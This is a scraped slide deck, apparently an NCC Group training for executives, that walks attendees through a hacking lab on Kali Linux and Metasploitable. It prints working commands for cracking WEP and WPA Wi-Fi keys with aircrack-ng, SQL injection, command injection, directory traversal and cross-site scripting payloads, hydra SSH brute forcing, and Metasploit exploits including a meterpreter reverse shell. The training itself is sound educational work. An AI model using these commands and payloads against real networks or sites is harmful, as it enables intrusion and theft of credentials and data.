Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Ntxissacsc5 red 1 & 2 basic hacking tools ncc group

121 views

Published on

ntxissacsc5

Published in: Internet
  • Be the first to comment

  • Be the first to like this

Ntxissacsc5 red 1 & 2 basic hacking tools ncc group

  1. 1. Hacking for Executives Basic Hacks Used by Real World Attackers North Texas Cyber Security Conference November 10th, 2017 Tony Cargile and Matt Nash
  2. 2. • Introductions • Session 1 • Getting the Lab Set Up • Configuring our Wifi Card • Attacking WEP protected routers • Brute forcing WPA protected routers • Finish Up With A Q&A • Session 2 • Enumeration • Web Application Attacks • Brute Force Attacks • Accessing Backdoors • Exploiting Known Vulnerabilities Agenda
  3. 3. ~ tony$ whoami • Principal Security Consultant at NCC Group • Austin Office • Specializing in Application Security and Security Development LifeCycle • National Conferences on DANE and SDLC • Background in Development • Bachelor of Science in Computer Science from University of Texas at Austin • Born and raised in Fort Worth, but don’t hold that against me
  4. 4. ~ matt$ whoami • Security Consultant at NCC Group • Austin Office • Specializing in Application Security, Infrastructure Assessment, and Forensics • Certified Digital Forensic Investigator and Incident Responder • Background in System Administration • Bachelor of Science in Food & Resource Economics from University of Florida • Born and raised in Florida - sometimes referred to as Florida Man • (only some of the news stories are true)
  5. 5. What is this training • This is not a BlackHat Training • No technical experience needed • The purpose of this training is to teach basic attacks and tools to managers and executives in decision making roles within the security realm. • All the tools and labs are open source and available online
  6. 6. The Lab • Everyone will be constructing their own “hacker lab” within their computer. • The Lab will consist of two virtual machines, controlled by VMware Player: • Kali Linux: A common attacker Linux OS • Metasploitable: A purposefully vulnerable Linux OS • This course is designed for Windows, but 100% possible on Macs and Linux
  7. 7. The Wifi Lab • SSID: NCC Lab 1 • WPA Password Protected • BSSID: 00:1F:33:E5:2C:A1 • Password: ? • SSID: NCC Lab 2 • WEP Protected • BSSID: 68:7F:74:C4:D8:64 • Password: ?
  8. 8. Setting Up the Lab
  9. 9. Opening the USB • 3 Files • Kali Linux VM – 7zipped • Metasploitable 2 VM – zipped • VMware Player Windows Installer
  10. 10. VMWare Install • First, start by running the VMware installer
  11. 11. VMWare Install • Accept the EULA
  12. 12. VMware install • No need to install the Enhanced Keyboard Driver
  13. 13. VMware install • Determine whether you want to give VMware your data
  14. 14. VMware install
  15. 15. VMware install
  16. 16. Run VMware Player Once Installed • Once installed, on first run it will ask for a license
  17. 17. Extracting the VMs
  18. 18. Extracting the VMs • Extract to an easy to locate address. • Take note of where you extracted • Don’t put it on the USB
  19. 19. Installing 7-Zip Right-click on the 7-Zip installer and click “Run as administrator”
  20. 20. Installing 7-Zip Enter administrator password and click “Yes”
  21. 21. Installing 7-Zip Click “Install”
  22. 22. Installing 7-Zip
  23. 23. Installing 7-Zip Open 7-Zip program and navigate to the folder containing the Kali archive
  24. 24. Installing 7-Zip Select the Kali Archive and click “Extract”
  25. 25. Installing 7-Zip Choose an extraction location and click “OK”
  26. 26. Extracting the VMs
  27. 27. Opening the VMs
  28. 28. Opening the VMs
  29. 29. Configuring the VMs • This is an important step for 2 reasons: 1. We need to make sure that our VMs can talk to each other. 2. We need to make sure that we don’t expose our VMs to the world.
  30. 30. Configuring the VMs • Verify that the Network Adapter says “NAT”
  31. 31. Powering On Metasploitable
  32. 32. Powering On Metasploitable
  33. 33. Powering On Metasploitable
  34. 34. Powering On Metasploitable
  35. 35. Installing VMware Tools
  36. 36. Logging Into Metasploitable • Default credentials: • Username: msfadmin • Password: msfadmin
  37. 37. Logged into Metasploitable
  38. 38. Getting the IP Address INPUT: ifconfig • Note the IP Address: we will need it later!
  39. 39. Powering on Kali • You will go through the same steps as when you powered on Metasploitable. • Click “I copied it” • Don’t change the keyboard timeout • Install VMware tools.
  40. 40. Kali Starting Up
  41. 41. Enable Full Screen
  42. 42. Log into Kali • Default credentials: • Username: root • Password: toor
  43. 43. Kali on Startup
  44. 44. Opening the terminal • Unlike Windows, the task bar is on the top • Kali now has the quick start bar on the left • Click the black terminal icon
  45. 45. Getting Kali’s IP Address COMMAND: ifconfig • Note the IP Address: we will need it later!
  46. 46. Wireless Attacks
  47. 47. Connect USB WiFi Adapter to Kali Plug in the provided USB wireless adapter and click the “Show devices” icon in the top-right
  48. 48. Connect USB WiFi Adapter to Kali Mouse over USB icon to display connected USB device
  49. 49. Connect USB WiFi Adapter to Kali Right-click on USB icon and click “Connect (Disconnect from host)”
  50. 50. Connect USB WiFi Adapter to Kali
  51. 51. Verify Kali Sees the WiFi Adapter
  52. 52. Check the Name of the WiFi Interface Open a Terminal window and use `ip addr` command to list network interfaces INPUT: ip addr
  53. 53. Place WiFi Interface Into Monitor Mode Use `airmon-ng` to place wlan0 interface into “monitor” mode INPUT: airmon-ng start wlan0
  54. 54. Kill Problematic Processes Use `airmon-ng` to kill processes which may cause problems with wireless interception INPUT: airmon-ng check kill
  55. 55. Kill Problematic Processes Use `airodump-ng` to search for nearby wireless access points INPUT: airodump-ng wlan0mon
  56. 56. Nearby Wireless Access Points We see two interesting access points – one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)
  57. 57. Cracking WEP
  58. 58. Nearby Wireless Access Points We see two interesting access points – one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)
  59. 59. Capturing Wireless Traffic Use `airodump-ng` to capture traffic to/from the identified WEP-encrypted access point INPUT: airodump-ng –c 6 –bssid 68:7F:74:C4:D8:64 –ivs –w Desktop/NCC-Lab-2/NCC-Lab-2_ivs wlan0mon
  60. 60. Capturing Wireless Traffic Actively capturing data to/from the identified WEP-encrypted access point
  61. 61. Capturing Wireless Traffic Using `aircrack-ng` against the captured wireless data INPUT: aircrack-ng Desktop/NCC-Lab-2/NCC-Lab-2_ivs-01.ivs
  62. 62. Capturing Wireless Traffic `aircrack-ng` has cracked the WEP key used to encrypt data to/from this wireless access point
  63. 63. Capturing Wireless Traffic `aircrack-ng` has cracked the WEP key used to encrypt data to/from this wireless access point
  64. 64. Bruteforcing WPA
  65. 65. Nearby Wireless Access Points We see two interesting access points – one with WEP encryption (NCC Lab 2) and another with WPA encryption (NCC Lab 1)
  66. 66. Capturing Wireless Traffic Use `airodump-ng` to capture traffic to/from the identified WPA-encrypted access point INPUT: airodump-ng –c 11 –bssid 00:1F:33:E5:2C:A1 –w Desktop/NCC-Lab-1/NCC-Lab-1 wlan0mon
  67. 67. Capturing Wireless Traffic Actively capturing data to/from the identified WPA-encrypted access point
  68. 68. Capturing Wireless Traffic Using `aircrack-ng` against the captured wireless data INPUT: aircrack-ng -b 00:1F:33:E5:2C:A1 –w /usr/share/wordlists/rockyou.txt Desktop/NCC-Lab-1/NCC-Lab-1-01.cap
  69. 69. Capturing Wireless Traffic `aircrack-ng` is attempting a brute force attack using the passwords in the “rockyou” wordlist
  70. 70. Capturing Wireless Traffic `aircrack-ng` has cracked the WPA key used to encrypt data to/from this wireless access point
  71. 71. Web Application Attacks
  72. 72. Open the Web Browser • Select the orange Firefox ESR icon • Can also be selected by going to Applications
  73. 73. Browse to Metasploitable • Input the IP Address of Metasploitable into the URL Bar
  74. 74. Welcome to DVWA
  75. 75. Turn on Easy Mode
  76. 76. The Reset Button
  77. 77. SQL Injection • What is it? • How prevalent is it? • How much damage can it cause?
  78. 78. SQL Injection
  79. 79. SQL Injection
  80. 80. SQL Injection • Error messages are great resources for Attackers!
  81. 81. SQL Injection INPUT: ‘ or 1=1+’
  82. 82. SQL Injection INPUT: ‘ UNION ALL SELECT user,password from users where 1=1+’
  83. 83. Command Injection • What is it? • How prevalent is it? • How much damage can it cause? • Similar to SQL Injection, but instead of injecting into SQL Database, we are injecting into a command request by the web application server.
  84. 84. Command Injection INPUT: 8.8.8.8
  85. 85. Command Injection
  86. 86. Command Injection INPUT: 8.8.8.8; ls
  87. 87. Command Injection INPUT: 8.8.8.8; whoami
  88. 88. Command Injection INPUT: 8.8.8.8; cat /etc/passwd
  89. 89. Local File Inclusion/Directory Traversal • What is it? • How prevalent is it? • How much damage can it cause?
  90. 90. Local File Inclusion/Directory Traversal
  91. 91. Local File Inclusion/Directory Traversal INPUT: test.php
  92. 92. Local File Inclusion/Directory Traversal INPUT: ../../phpinfo.php
  93. 93. Local File Inclusion/Directory Traversal INPUT: ../../../../../../../../etc/passwd
  94. 94. Cross Site Scripting • What is it? • How prevalent is it? • How much damage can it cause?
  95. 95. Stored Cross Site Scripting
  96. 96. Stored Cross Site Scripting
  97. 97. Stored Cross Site Scripting INPUT: <img src=“http://bit.ly/2dtWOWN”>
  98. 98. Stored Cross Site Scripting
  99. 99. Stored Cross Site Scripting INPUT: <script>alert(document.cookie);</script>
  100. 100. Stored Cross Site Scripting
  101. 101. Stored Cross Site Scripting DON’T DO THIS: <script>document.location=“https://nccgroup.trust”;</script>
  102. 102. Reflected Cross Site Scripting
  103. 103. Reflected Cross Site Scripting
  104. 104. Reflected Cross Site Scripting
  105. 105. Reflected Cross Site Scripting
  106. 106. Reflected Cross Site Scripting
  107. 107. Reflected Cross Site Scripting
  108. 108. Network Penetration Attacks
  109. 109. Enumeration INPUT: nmap -sV -p- 192.168.132.128
  110. 110. Enumeration
  111. 111. Brute Forcing Passwords INPUT: hydra -l sys –P /usr/share/john/password.lst –t 4 192.168.132.128 ssh
  112. 112. Brute Forcing Passwords
  113. 113. Brute Forcing Passwords INPUT: ssh sys@192.168.132.128
  114. 114. Running Metasploit INPUT: msfconsole
  115. 115. Enumeration
  116. 116. Loading an Exploit INPUT: use exploit/unix/ftp/vsftpd_234_backdoor
  117. 117. Loading an Exploit INPUT: show options INPUT: set RHOST 192.168.132.128
  118. 118. Running an Exploit INPUT: run
  119. 119. Running an Exploit INPUT: id INPUT: whoami INPUT: ls
  120. 120. Loading an Exploit INPUT: use exploit/unix/misc/distcc_exec
  121. 121. Loading an Exploit INPUT: show options INPUT: set RHOST 192.168.132.128
  122. 122. Running an Exploit INPUT: run INPUT: id INPUT: ls
  123. 123. Exploiting Java RMI Using Meterpreter INPUT: use exploit/multi/misc/java_rmi_server INPUT: show options
  124. 124. Exploiting Java RMI Using Meterpreter INPUT: set RHOST 192.168.132.128 INPUT: set LHOST 192.168.132.129 INPUT: set PAYLOAD java/meterpreter/reverse_tcp INPUT: run
  125. 125. Q&A
  126. 126. Contact Us • Mitchell Merrick • Strategic Account Manager • Mitchell.Merrick@nccgroup.trust • (512) 431-6213 • Tony Cargile • Principal Security Consultant • Tony.Cargile@nccgroup.trust • Matt Nash • Security Consultant • Matt.Nash@nccgroup.trust • www.nccgroup.trust • https://www.linkedin.com/company/ncc-group/ • https://twitter.com/NCCGroupplc • https://www.facebook.com/NCCGroupplc/ • https://plus.google.com/+nccgroup
  127. 127. 127 Office Locations Europe Manchester - Head Office Basingstoke Belgium Cheltenham Denmark Edinburgh Germany Glasgow Leatherhead Leeds Lithuania London Luxembourg Milton Keynes Spain Sweden Switzerland The Netherlands USA Atlanta, GA Austin, TX Chicago, IL New York, NY San Francisco, CA Seattle, WA Sunnyvale, CA Australia Sydney Canada Kitchener, ON Middle East Dubai

×